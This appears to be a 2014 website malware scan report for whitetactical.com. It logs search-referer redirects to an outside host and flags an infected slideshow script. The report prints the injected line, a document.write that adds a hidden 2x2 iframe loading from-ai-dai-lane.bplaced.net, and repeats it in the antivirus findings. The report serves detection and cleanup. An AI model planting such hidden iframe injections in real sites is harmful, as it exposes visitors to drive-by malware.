Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://whitetactical.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: whitetactical.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Dec 2014 08:51:04 GMT Location: http://from-ai-dai-lane.bplaced.net/aawf.html?h=783978 Server: Apache Content-Length: 305 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://from-ai-dai-lane.bplaced.net/aawf.html?h=783978 (imitation of visitor from search engine) GET /aawf.html?h=783978 HTTP/1.1 Host: from-ai-dai-lane.bplaced.net Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Dec 2014 08:51:05 GMT Location: http://www.bplaced.net/404 Server: Apache/2.4 Content-Length: 292 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://whitetactical.com/ | 200 OK Content-Length: 5597 Content-Type: text/html | clean |
http://whitetactical.com/services.html | 200 OK Content-Length: 4298 Content-Type: text/html | clean |
http://whitetactical.com/pictures.html | 200 OK Content-Length: 7589 Content-Type: text/html | clean |
http://whitetactical.com/js/image-slideshow.js | 200 OK Content-Length: 4237 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=783978></iframe>');
var displayWaitMessage=true; var activeImage = false; var imageGalleryLeftPos = false; var imageGalleryWidth = false; var imageGalleryObj = false; var maxGalleryXPos = false; var slideSpeed = 0; var imageGalleryCaptions = new Array(); fun img.onload = function() { hideWaitMessageAndShowCaption(imageIndex-1); }; img.src = imagePath; } function hideWaitMessageAndShowCaption(imageIndex) { document.getElementById('waitMessage').style.display='none'; document.getElementById('largeImageCaption').innerHTML = imageGalleryCaptions[imageIndex]; document.getElementById('largeImageCaption').style.display='block'; } window.onload = initSlideShow; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=783978 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=783978> | ||
http://whitetactical.com/pricing.html | 200 OK Content-Length: 5623 Content-Type: text/html | clean |
http://whitetactical.com/shipping.html | 200 OK Content-Length: 4534 Content-Type: text/html | clean |
http://whitetactical.com/contact.html | 200 OK Content-Length: 1979 Content-Type: text/html | clean |
http://whitetactical.com/test404page.js | 404 Not Found Content-Length: 1814 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?i=783978 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?i=783978> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=whitetactical.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://whitetactical.com/
Result: whitetactical.com is not infected or malware details are not published yet.
Result: whitetactical.com is not infected or malware details are not published yet.